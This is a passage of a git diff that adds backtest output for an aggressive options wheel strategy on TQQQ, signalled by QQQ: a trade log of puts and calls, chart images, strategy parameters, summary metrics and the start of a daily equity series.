"type": "PUT", + "action": "TP_Close", + "strike": 51.8, + "spot": 58.028045654296875, + "premium": 0.6423018604945661, + "close_cost": 0.07661382961036578, + "pnl": 50.58880308842002, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-11-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 54.68, + "spot": 58.97001266479492, + "premium": 0.832744356436832, + "close_cost": 0.30740027044818063, + "pnl": 46.55440859886514, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-11-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.56, + "spot": 56.17401885986328, + "premium": 0.6046077804997161, + "close_cost": 0.03662807947514746, + "pnl": 50.81797010245687, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-11-21 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 49.07, + "spot": 47.327518463134766, + "premium": 0.6957166706715263, + "close_cost": 1.7424815368652347, + "pnl": -107.66648661937083, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-11-28 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 48.27, + "spot": 54.36484909057617, + "premium": 1.442778747749827, + "close_cost": 6.094849090576169, + "pnl": -468.19703428263415, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 51.1, + "spot": 55.12240982055664, + "premium": 0.8885543779888518, + "close_cost": 0.22771800847670498, + "pnl": 60.10363695121468, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 52.61, + "spot": 55.83012390136719, + "premium": 0.7019645425702308, + "close_cost": 0.1930723601146358, + "pnl": 44.9092182455595, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-16 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.49, + "spot": 52.161949157714844, + "premium": 0.5255269728821705, + "close_cost": 0.22041313720210542, + "pnl": 24.53138356800651, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 50.15, + "spot": 54.075782775878906, + "premium": 0.47745539216248645, + "close_cost": 0.13864091225912745, + "pnl": 27.9014479903359, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-01-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 51.91, + "spot": 52.263587951660156, + "premium": 0.2968084430280751, + "close_cost": 0.0, + "pnl": 23.700844302807507, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2026-01-05 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.13, + "spot": 53.51152420043945, + "premium": 0.27308307351277783, + "close_cost": 0.041062341360688315, + "pnl": 17.22207321520895, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-01-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 52.33, + "spot": 55.79774475097656, + "premium": 0.369411761450964, + "close_cost": 0.14436308920966834, + "pnl": 16.524867224129565, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-01-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 50.81, + "spot": 53.811031341552734, + "premium": 0.1477798974439022, + "close_cost": 0.0022624023227785783, + "pnl": 8.57174951211236, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2026-01-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 51.03, + "spot": 54.98908615112305, + "premium": 0.2433979224470182, + "close_cost": 0.050428038206870696, + "pnl": 13.316988424014749, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-02-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 50.68, + "spot": 55.00904846191406, + "premium": 0.29612130729873165, + "close_cost": 0.05015753030630954, + "pnl": 18.61637769924221, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-02-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.48, + "spot": 51.654598236083984, + "premium": 0.563188229925693, + "close_cost": 0.13619518544464437, + "pnl": 36.71930444810485, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-02-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.49, + "spot": 48.27019119262695, + "premium": 0.5999675089350056, + "close_cost": 0.220282559906253, + "pnl": 31.988494902875264, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-02-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.98, + "spot": 49.69783020019531, + "premium": 0.4884002354982204, + "close_cost": 0.21242084272299522, + "pnl": 21.61793927752252, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-03-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.47, + "spot": 49.61796569824219, + "premium": 0.5888532941584685, + "close_cost": 0.25315686325419495, + "pnl": 27.589643090427362, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 44.61, + "spot": 49.308475494384766, + "premium": 0.4907682450346762, + "close_cost": 0.04880422279325147, + "pnl": 38.21640222414247, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-16 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.1, + "spot": 47.38166046142578, + "premium": 0.36589208886678115, + "close_cost": 0.05541615318789983, + "pnl": 25.06759356788813, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.43, + "spot": 44.496429443359375, + "premium": 0.4571711027535077, + "close_cost": 0.07888536647136002, + "pnl": 31.84857362821477, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.45, + "spot": 41.68000030517578, + "premium": 0.4899103648679617, + "close_cost": 0.03275982095700081, + "pnl": 39.735054391096085, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-04-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.45, + "spot": 48.0, + "premium": 0.782588368441985, + "close_cost": 0.12738446714409601, + "pnl": 59.54039012978889, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2026-04-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.62, + "spot": 53.40999984741211, + "premium": 1.0000270235383653, + "close_cost": 0.3787688574986472, + "pnl": 56.14581660397181, + "hold_days": 1, + "result": "Win" + } +] \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/drawdown.png b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/drawdown.png new file mode 100644 index 0000000..fe51c33 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/drawdown.png differ diff --git a/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/equity.png b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/equity.png new file mode 100644 index 0000000..81a2af9 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/equity.png differ diff --git a/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/indicators.png b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/indicators.png new file mode 100644 index 0000000..f695f2d Binary files /dev/null and b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/indicators.png differ diff --git a/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/monthly.png b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/monthly.png new file mode 100644 index 0000000..bcb7b1b Binary files /dev/null and b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/monthly.png differ diff --git a/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/meta.json b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/meta.json new file mode 100644 index 0000000..eb5eed0 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/meta.json @@ -0,0 +1,15 @@ +{ + "start": "2021-04-01", + "end": "2026-04-24", + "style": "aggressive", + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "put_otm_pct": 6.0, + "call_otm_pct": 2.0, + "put_tp_pct": 50.0, + "call_tp_pct": 80.0, + "put_sl_pct": null, + "call_sl_pct": null, + "engine_version": "wheel-v3-split", + "rule_version": "tqqq-wheel-manual-v1.1" +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/metrics.json b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/metrics.json new file mode 100644 index 0000000..92ae62b --- /dev/null +++ b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/metrics.json @@ -0,0 +1,15 @@ +{ + "total_return": 22.376311911285395, + "final_value": 12237.63119112854, + "cagr": 4.071794145596375, + "sharpe": 0.18207740240393414, + "max_dd": -12.670101265549032, + "n_trades": 167, + "wins": 139, + "losses": 28, + "win_rate": 83.23353293413174, + "avg_win": 39.6029966744192, + "avg_loss": -154.63291729042496, + "chain_quotes": 0, + "bs_quotes": 644 +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/series.json b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/series.json new file mode 100644 index 0000000..8fc5aff --- /dev/null +++ b/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/series.json @@ -0,0 +1,30760 @@ +{ + "equity": [ + [ + "2021-04-01", + 9998.183037138344 + ], + [ + "2021-04-05", + 10011.819477826999 + ], + [ + "2021-04-06", + 10012.993901433989 + ], + [ + "2021-04-07", + 10014.168462805228 + ], + [ + "2021-04-08", + 10015.343161956878 + ], + [ + "2021-04-09", + 10016.517998905103 + ], + [ + "2021-04-12", + 10017.692973666064 + ], + [ + "2021-04-13", + 10018.868086255929 + ], + [ + "2021-04-14", + 10020.043336690864 + ], + [ + "2021-04-15", + 10021.21872498704 + ], + [ + "2021-04-16", + 10022.39425116063 + ], + [ + "2021-04-19", + 10023.569915227803 + ], + [ + "2021-04-20", + 10024.745717204738 + ], + [ + "2021-04-21", + 10025.921657107612 + ], + [ + "2021-04-22", + 10027.097734952604 + ], + [ + "2021-04-23", + 10028.273950755894 + ], + [ + "2021-04-26", + 10029.450304533668 + ], + [ + "2021-04-27", + 10030.626796302107 + ], + [ + "2021-04-28", + 10031.8034260774 + ], + [ + "2021-04-29", + 10032.980193875735 + ], + [ + "2021-04-30", + 10034.157099713304 + ], + [ + "2021-05-03", + 10035.334143606298 + ], + [ + "2021-05-04", + 10033.521325570913 + ], + [ + "2021-05-05", + 10032.58459180628 + ], + [ + "2021-05-06", + 10042.429649753263 + ], + [ + "2021-05-07", + 10043.6076640471 + ], + [ + "2021-05-10", + 10044.78581652639 + ], + [ + "2021-05-11", + 10042.97410720734 + ], + [ + "2021-05-12", + 9978.01902449439 + ], + [ + "2021-05-13", + 10010.756383210673 + ], + [ + "2021-05-14", + 10053.21624747579 + ], + [ + "2021-05-17", + 10062.62787490469 + ], + [ + "2021-05-18", + 10060.81825852535 + ], + [ + "2021-05-19", + 10069.14959222023 + ], + [ + "2021-05-20", + 10083.860481191461 + ], + [ + "2021-05-21", + 10085.043355475693 + ], + [ + "2021-05-24", + 10086.226368515472 + ], + [ + "2021-05-25", + 10084.419520327074 + ], + [ + "2021-05-26", + 10096.004021190514 + ], + [ + "2021-05-27", + 10096.74748797434 + ], + [ + "2021-05-28", + 10105.062994088155 + ], + [ + "2021-06-01", + 10103.258355505894 + ], + [ + "2021-06-02", + 10115.651050559407 + ], + [ + "2021-06-03", + 10102.085906069462 + ], + [ + "2021-06-04", + 10128.557063040265 + ], + [ + "2021-06-07", + 10129.745180399545 + ], + [ + "2021-06-08", + 10127.943437129403 + ], + [ + "2021-06-09", + 10134.254575356526 + ], + [ + "2021-06-10", + 10151.003649127908 + ], + [ + "2021-06-11", + 10152.194399555097 + ], + [ + "2021-06-14", + 10153.385289661734 + ], + [ + "2021-06-15", + 10154.576319464202 + ], + [ + "2021-06-16", + 10155.76748897889 + ], + [ + "2021-06-17", + 10156.958798222187 + ], + [ + "2021-06-18", + 10158.150247210482 + ], + [ + "2021-06-21", + 10159.341835960167 + ], + [ + "2021-06-22", + 10160.53356448764 + ], + [ + "2021-06-23", + 10161.725432809293 + ], + [ + "2021-06-24", + 10162.917440941528 + ], + [ + "2021-06-25", + 10164.109588900743 + ], + [ + "2021-06-28", + 10165.30187670334 + ], + [ + "2021-06-29", + 10166.494304365726 + ], + [ + "2021-06-30", + 10167.686871904305 + ], + [ + "2021-07-01", + 10168.879579335486 + ], + [ + "2021-07-02", + 10170.072426675677 + ], + [ + "2021-07-06", + 10171.265413941292 + ], + [ + "2021-07-07", + 10172.458541148742 + ], + [ + "2021-07-08", + 10173.651808314446 + ], + [ + "2021-07-09", + 10174.84521545482 + ], + [ + "2021-07-12", + 10176.038762586282 + ], + [ + "2021-07-13", + 10177.232449725258 + ], + [ + "2021-07-14", + 10178.426276888167 + ], + [ + "2021-07-15", + 10179.620244091437 + ], + [ + "2021-07-16", + 10180.814351351493 + ], + [ + "2021-07-19", + 10182.008598684766 + ], + [ + "2021-07-20", + 10183.202986107686 + ], + [ + "2021-07-21", + 10184.397513636686 + ], + [ + "2021-07-22", + 10185.592181288202 + ], + [ + "2021-07-23", + 10186.786989078671 + ], + [ + "2021-07-26", + 10187.981937024531 + ], + [ + "2021-07-27", + 10189.177025142222 + ], + [ + "2021-07-28", + 10190.372253448188 + ], + [ + "2021-07-29", + 10191.567621958873 + ], + [ + "2021-07-30", + 10192.763130690724 + ], + [ + "2021-08-02", + 10193.95877966019 + ], + [ + "2021-08-03", + 10195.15456888372 + ], + [ + "2021-08-04", + 10196.350498377766 + ], + [ + "2021-08-05", + 10197.546568158783 + ], + [ + "2021-08-06", + 10198.742778243228 + ], + [ + "2021-08-09", + 10199.939128647558 + ], + [ + "2021-08-10", + 10201.135619388235 + ], + [ + "2021-08-11", + 10202.332250481719 + ], + [ + "2021-08-12", + 10203.529021944474 + ], + [ + "2021-08-13", + 10204.725933792966 + ], + [ + "2021-08-16", + 10205.922986043663 + ], + [ + "2021-08-17", + 10207.120178713034 + ], + [ + "2021-08-18", + 10208.317511817551 + ], + [ + "2021-08-19", + 10209.51498537369 + ], + [ + "2021-08-20", + 10210.712599397923 + ], + [ + "2021-08-23", + 10211.910353906727 + ], + [ + "2021-08-24", + 10213.108248916586 + ], + [ + "2021-08-25", + 10214.306284443977 + ], + [ + "2021-08-26", + 10215.504460505384 + ], + [ + "2021-08-27", + 10216.702777117294 + ], + [ + "2021-08-30", + 10217.901234296192 + ], + [ + "2021-08-31", + 10219.09983205857 + ], + [ + "2021-09-01", + 10220.298570420915 + ], + [ + "2021-09-02", + 10221.497449399722 + ], + [ + "2021-09-03", + 10222.696469011486 + ], + [ + "2021-09-07", + 10223.895629272703 + ], + [ + "2021-09-08", + 10225.094930199873 + ], + [ + "2021-09-09", + 10226.294371809496 + ], + [ + "2021-09-10", + 10227.493954118074 + ], + [ + "2021-09-13", + 10228.693677142111 + ], + [ + "2021-09-14", + 10229.893540898116 + ], + [ + "2021-09-15", + 10231.093545402595 + ], + [ + "2021-09-16", + 10232.293690672059 + ], + [ + "2021-09-17", + 10233.493976723019 + ], + [ + "2021-09-20", + 10231.704403571992 + ], + [ + "2021-09-21", + 10239.904710500625 + ], + [ + "2021-09-22", + 10244.013255344335 + ], + [ + "2021-09-23", + 10245.214916143756 + ], + [ + "2021-09-24", + 10246.416717902452 + ], + [ + "2021-09-27", + 10244.628660636958 + ], + [ + "2021-09-28", + 10136.060085246532 + ], + [ + "2021-09-29", + 10129.960266041599 + ], + [ + "2021-09-30", + 10112.205136441953 + ], + [ + "2021-10-01", + 10159.319119939715 + ], + [ + "2021-10-04", + 9996.861321296114 + ], + [ + "2021-10-05", + 10052.39003895834 + ], + [ + "2021-10-06", + 10078.326996200365 + ], + [ + "2021-10-07", + 10101.527329561302 + ], + [ + "2021-10-08", + 10101.474416635507 + ], + [ + "2021-10-11", + 10116.888494226587 + ], + [ + "2021-10-12", + 10116.700696290822 + ], + [ + "2021-10-13", + 10133.275306293574 + ], + [ + "2021-10-14", + 10134.46397712031 + ], + [ + "2021-10-15", + 10135.652787382547 + ], + [ + "2021-10-18", + 10133.851737096644 + ], + [ + "2021-10-19", + 10152.834819692236 + ], + [ + "2021-10-20", + 10155.341929608929 + ], + [ + "2021-10-21", + 10156.53318893253 + ], + [ + "2021-10-22", + 10157.724587995275 + ], + [ + "2021-10-25", + 10155.926126813554 + ], + [ + "2021-10-26", + 10179.399958633527 + ], + [ + "2021-10-27", + 10180.59404005328 + ], + [ + "2021-10-28", + 10181.788261543219 + ], + [ + "2021-10-29", + 10182.982623119775 + ], + [ + "2021-11-01", + 10184.177124799378 + ], + [ + "2021-11-02", + 10185.371766598466 + ], + [ + "2021-11-03", + 10186.566548533472 + ], + [ + "2021-11-04", + 10187.761470620837 + ], + [ + "2021-11-05", + 10188.956532877 + ], + [ + "2021-11-08", + 10190.151735318404 + ], + [ + "2021-11-09", + 10191.347077961495 + ], + [ + "2021-11-10", + 10189.552560822716 + ], + [ + "2021-11-11", + 10197.691915429159 + ], + [ + "2021-11-12", + 10198.888142563379 + ], + [ + "2021-11-15", + 10200.084510019484 + ], + [ + "2021-11-16", + 10201.281017813933 + ], + [ + "2021-11-17", + 10202.477665963192 + ], + [ + "2021-11-18", + 10203.674454483722 + ], + [ + "2021-11-19", + 10204.87138339199 + ], + [ + "2021-11-22", + 10203.078452704465 + ], + [ + "2021-11-23", + 10198.775696934437 + ], + [ + "2021-11-24", + 10209.123534768269 + ], + [ + "2021-11-26", + 10157.810357970806 + ], + [ + "2021-11-29", + 10215.89003727771 + ], + [ + "2021-11-30", + 10169.604205486567 + ], + [ + "2021-12-01", + 10067.172619701842 + ], + [ + "2021-12-02", + 10124.218644963114 + ], + [ + "2021-12-03", + 9991.857515326885 + ], + [ + "2021-12-06", + 10083.107766360348 + ], + [ + "2021-12-07", + 10198.376380544469 + ], + [ + "2021-12-08", + 10219.031896994495 + ], + [ + "2021-12-09", + 10191.738762345036 + ], + [ + "2021-12-10", + 10229.843554330613 + ], + [ + "2021-12-13", + 10248.945411789224 + ], + [ + "2021-12-14", + 10224.275181145731 + ], + [ + "2021-12-15", + 10283.696258877637 + ], + [ + "2021-12-16", + 10284.902574640748 + ], + [ + "2021-12-17", + 10286.109031909178 + ], + [ + "2021-12-20", + 10284.325630699528 + ], + [ + "2021-12-21", + 10329.738718217199 + ], + [ + "2021-12-22", + 10330.950434931785 + ], + [ + "2021-12-23", + 10332.162293785243 + ], + [ + "2021-12-27", + 10330.384294794245 + ], + [ + "2021-12-28", + 10336.108176533808 + ], + [ + "2021-12-29", + 10352.344745964252 + ], + [ + "2021-12-30", + 10361.213308123726 + ], + [ + "2021-12-31", + 10352.921905150075 + ], + [ + "2022-01-03", + 10427.164919939038 + ], + [ + "2022-01-04", + 10384.76130787654 + ], + [ + "2022-01-05", + 10188.385577150884 + ], + [ + "2022-01-06", + 10192.21525524655 + ], + [ + "2022-01-07", + 10099.754951004532 + ], + [ + "2022-01-10", + 10116.721418816936 + ], + [ + "2022-01-11", + 10198.401112157871 + ], + [ + "2022-01-12", + 10227.297504358849 + ], + [ + "2022-01-13", + 10109.976674061603 + ], + [ + "2022-01-14", + 10164.44002817576 + ], + [ + "2022-01-18", + 9964.921706243154 + ], + [ + "2022-01-19", + 9906.051280429507 + ], + [ + "2022-01-20", + 9822.045514948522 + ], + [ + "2022-01-21", + 9642.230100410745 + ], + [ + "2022-01-24", + 9692.652881274758 + ], + [ + "2022-01-25", + 9555.048256668688 + ], + [ + "2022-01-26", + 9560.203087305012 + ], + [ + "2022-01-27", + 9520.40305947109 + ], + [ + "2022-01-28", + 9633.229676174442 + ], + [ + "2022-01-31", + 9688.532741323665 + ], + [ + "2022-02-01", + 9686.866339360213 + ], + [ + "2022-02-02", + 9716.093258913883 + ], + [ + "2022-02-03", + 9571.874747491232 + ], + [ + "2022-02-04", + 9637.580269518965 + ], + [ + "2022-02-07", + 9659.439086619392 + ], + [ + "2022-02-08", + 9769.986383071571 + ], + [ + "2022-02-09", + 9817.268174167111 + ], + [ + "2022-02-10", + 9818.41977618365 + ], + [ + "2022-02-11", + 9819.571513287381 + ], + [ + "2022-02-14", + 9820.723385494153 + ], + [ + "2022-02-15", + 9818.885392819813 + ], + [ + "2022-02-16", + 9832.038955847767 + ], + [ + "2022-02-17", + 9736.831504536643 + ], + [ + "2022-02-18", + 9702.817109666184 + ], + [ + "2022-02-22", + 9680.113951999314 + ], + [ + "2022-02-23", + 9579.77425040255 + ], + [ + "2022-02-24", + 9712.557305949409 + ], + [ + "2022-02-25", + 9774.057655515568 + ], + [ + "2022-02-28", + 9840.106061908262 + ], + [ + "2022-03-01", + 9852.088786200602 + ], + [ + "2022-03-02", + 9914.082729089501 + ], + [ + "2022-03-03", + 9879.408748820497 + ], + [ + "2022-03-04", + 9839.67921394574 + ], + [ + "2022-03-07", + 9624.34050084391 + ], + [ + "2022-03-08", + 9619.115850788949 + ], + [ + "2022-03-09", + 9712.020055280693 + ], + [ + "2022-03-10", + 9704.655848387263 + ], + [ + "2022-03-11", + 9656.619312050805 + ], + [ + "2022-03-14", + 9591.939866859253 + ], + [ + "2022-03-15", + 9665.254165919572 + ], + [ + "2022-03-16", + 9714.191830781516 + ], + [ + "2022-03-17", + 9725.651164579845 + ], + [ + "2022-03-18", + 9732.92476695945 + ], + [ + "2022-03-21", + 9731.988145985255 + ], + [ + "2022-03-22", + 9781.526582230825 + ], + [ + "2022-03-23", + 9770.564964619942 + ], + [ + "2022-03-24", + 9812.689784648868 + ], + [ + "2022-03-25", + 9813.840849603313 + ], + [ + "2022-03-28", + 9812.002049581952 + ], + [ + "2022-03-29", + 9863.5401112411 + ], + [ + "2022-03-30", + 9855.502470204601 + ], + [ + "2022-03-31", + 9835.012575265833 + ], + [ + "2022-04-01", + 9850.339153675777 + ], + [ + "2022-04-04", + 9915.530909491821 + ], + [ + "2022-04-05", + 9844.378958376343 + ], + [ + "2022-04-06", + 9752.570000689348 + ], + [ + "2022-04-07", + 9778.171467128363 + ], + [ + "2022-04-08", + 9706.61252874035 + ], + [ + "2022-04-11", + 9541.858376524859 + ], + [ + "2022-04-12", + 9542.772576739188 + ], + [ + "2022-04-13", + 9628.4113771164 + ], + [ + "2022-04-14", + 9552.555332869833 + ], + [ + "2022-04-18", + 9600.453365938765 + ], + [ + "2022-04-19", + 9667.608831444928 + ], + [ + "2022-04-20", + 9636.045422182699 + ], + [ + "2022-04-21", + 9563.18542507262 + ], + [ + "2022-04-22", + 9416.69638219768 + ], + [ + "2022-04-25", + 9475.572875921855 + ], + [ + "2022-04-26", + 9326.35030461222 + ], + [ + "2022-04-27", + 9334.452134133082 + ], + [ + "2022-04-28", + 9406.55712014093 + ], + [ + "2022-04-29", + 9290.019514686233 + ], + [ + "2022-05-02", + 9383.643805843549 + ], + [ + "2022-05-03", + 9413.781270411668 + ], + [ + "2022-05-04", + 9488.069846452303 + ], + [ + "2022-05-05", + 9346.454236459247 + ], + [ + "2022-05-06", + 9312.646155926577 + ], + [ + "2022-05-09", + 9137.98841942738 + ], + [ + "2022-05-10", + 9170.593489083054 + ], + [ + "2022-05-11", + 9106.032565456957 + ], + [ + "2022-05-12", + 9110.355907411673 + ], + [ + "2022-05-13", + 9201.636794483406 + ], + [ + "2022-05-16", + 9241.971855229081 + ], + [ + "2022-05-17", + 9297.930068364056 + ], + [ + "2022-05-18", + 9184.548672563938 + ], + [ + "2022-05-19", + 9175.043670627798 + ], + [ + "2022-05-20", + 9170.192205630878 + ], + [ + "2022-05-23", + 9227.366191615027 + ], + [ + "2022-05-24", + 9200.536276184672 + ], + [ + "2022-05-25", + 9241.027896458423 + ], + [ + "2022-05-26", + 9291.919773974667 + ], + [ + "2022-05-27", + 9297.940153376081 + ], + [ + "2022-05-31", + 9336.192906899854 + ], + [ + "2022-06-01", + 9338.554940522772 + ], + [ + "2022-06-02", + 9376.972999177611 + ], + [ + "2022-06-03", + 9375.082952934941 + ], + [ + "2022-06-06", + 9406.776110828396 + ], + [ + "2022-06-07", + 9426.337467366371 + ], + [ + "2022-06-08", + 9427.44321175915 + ], + [ + "2022-06-09", + 9428.549085859851 + ], + [ + "2022-06-10", + 9426.665089683693 + ], + [ + "2022-06-13", + 9357.515451376847 + ], + [ + "2022-06-14", + 9370.677644271143 + ], + [ + "2022-06-15", + 9432.053593628832 + ], + [ + "2022-06-16", + 9327.813123155784 + ], + [ + "2022-06-17", + 9365.010354322474 + ], + [ + "2022-06-21", + 9425.65163372349 + ], + [ + "2022-06-22", + 9435.018690011177 + ], + [ + "2022-06-23", + 9454.453462823722 + ], + [ + "2022-06-24", + 9455.96376688517 + ], + [ + "2022-06-27", + 9470.815179226303 + ], + [ + "2022-06-28", + 9422.105017113727 + ], + [ + "2022-06-29", + 9433.971818785994 + ], + [ + "2022-06-30", + 9410.388704237472 + ], + [ + "2022-07-01", + 9430.5556794351 + ], + [ + "2022-07-05", + 9487.202875061086 + ], + [ + "2022-07-06", + 9505.152700581735 + ], + [ + "2022-07-07", + 9525.651488885638 + ], + [ + "2022-07-08", + 9525.546455137797 + ], + [ + "2022-07-11", + 9514.963227177603 + ], + [ + "2022-07-12", + 9508.291386882367 + ], + [ + "2022-07-13", + 9518.643962277994 + ], + [ + "2022-07-14", + 9537.86467369202 + ], + [ + "2022-07-15", + 9581.878581052008 + ], + [ + "2022-07-18", + 9595.980672164116 + ], + [ + "2022-07-19", + 9615.701298445532 + ], + [ + "2022-07-20", + 9616.829255918963 + ], + [ + "2022-07-21", + 9617.957345705994 + ], + [ + "2022-07-22", + 9616.095567822147 + ], + [ + "2022-07-25", + 9630.743080896003 + ], + [ + "2022-07-26", + 9601.681430218572 + ], + [ + "2022-07-27", + 9649.711534377804 + ], + [ + "2022-07-28", + 9650.843481378217 + ], + [ + "2022-07-29", + 9648.985561160218 + ], + [ + "2022-08-01", + 9665.379364973347 + ], + [ + "2022-08-02", + 9669.540042010416 + ], + [ + "2022-08-03", + 9686.798908426701 + ], + [ + "2022-08-04", + 9687.935205913827 + ], + [ + "2022-08-05", + 9689.071636692868 + ], + [ + "2022-08-08", + 9687.21820077946 + ], + [ + "2022-08-09", + 9674.351899964235 + ], + [ + "2022-08-10", + 9709.700637458325 + ], + [ + "2022-08-11", + 9710.83962140332 + ], + [ + "2022-08-12", + 9711.978738955362 + ], + [ + "2022-08-15", + 9713.117990130122 + ], + [ + "2022-08-16", + 9714.257374943276 + ], + [ + "2022-08-17", + 9712.4068934105 + ], + [ + "2022-08-18", + 9722.819546095243 + ], + [ + "2022-08-19", + 9693.644278636364 + ], + [ + "2022-08-22", + 9630.257589670138 + ], + [ + "2022-08-23", + 9633.161197436668 + ], + [ + "2022-08-24", + 9644.894368915737 + ], + [ + "2022-08-25", + 9686.522290999359 + ], + [ + "2022-08-26", + 9566.109875818174 + ], + [ + "2022-08-29", + 9531.396821266813 + ], + [ + "2022-08-30", + 9509.200896269711 + ], + [ + "2022-08-31", + 9501.829508128652 + ], + [ + "2022-09-01", + 9508.44389818145 + ], + [ + "2022-09-02", + 9459.307421175248 + ], + [ + "2022-09-06", + 9462.143783299896 + ], + [ + "2022-09-07", + 9509.607019753346 + ], + [ + "2022-09-08", + 9528.874749040004 + ], + [ + "2022-09-09", + 9534.862478790626 + ], + [ + "2022-09-12", + 9556.657149582745 + ], + [ + "2022-09-13", + 9557.778180958234 + ], + [ + "2022-09-14", + 9558.899343834866 + ], + [ + "2022-09-15", + 9560.020638228068 + ], + [ + "2022-09-16", + 9558.152064153266 + ], + [ + "2022-09-19", + 9577.223481644476 + ], + [ + "2022-09-20", + 9578.346925527096 + ], + [ + "2022-09-21", + 9579.470501193855 + ], + [ + "2022-09-22", + 9580.594208660212 + ], + [ + "2022-09-23", + 9578.72804794163 + ], + [ + "2022-09-26", + 9591.001659943104 + ], + [ + "2022-09-27", + 9593.615876948244 + ], + [ + "2022-09-28", + 9594.74124371971 + ], + [ + "2022-09-29", + 9595.866742500879 + ], + [ + "2022-09-30", + 9594.002373307236 + ], + [ + "2022-10-03", + 9612.584354161952 + ], + [ + "2022-10-04", + 9613.711946006242 + ], + [ + "2022-10-05", + 9614.839670121244 + ], + [ + "2022-10-06", + 9615.967526522472 + ], + [ + "2022-10-07", + 9614.105515225445 + ], + [ + "2022-10-10", + 9618.9293823305 + ], + [ + "2022-10-11", + 9615.174101479473 + ], + [ + "2022-10-12", + 9620.846702799981 + ], + [ + "2022-10-13", + 9644.589896022111 + ], + [ + "2022-10-14", + 9642.731242235324 + ], + [ + "2022-10-17", + 9661.536003635343 + ], + [ + "2022-10-18", + 9662.669337689915 + ], + [ + "2022-10-19", + 9663.80280468878 + ], + [ + "2022-10-20", + 9664.936404647533 + ], + [ + "2022-10-21", + 9663.080137581772 + ], + [ + "2022-10-24", + 9681.56236419792 + ], + [ + "2022-10-25", + 9682.69804741896 + ], + [ + "2022-10-26", + 9683.83386385986 + ], + [ + "2022-10-27", + 9684.969813536247 + ], + [ + "2022-10-28", + 9683.115896463749 + ], + [ + "2022-10-31", + 9687.200255176449 + ], + [ + "2022-11-01", + 9683.054635731894 + ], + [ + "2022-11-02", + 9616.367062290481 + ], + [ + "2022-11-03", + 9570.61538190108 + ], + [ + "2022-11-04", + 9606.929652724251 + ], + [ + "2022-11-07", + 9634.036480033674 + ], + [ + 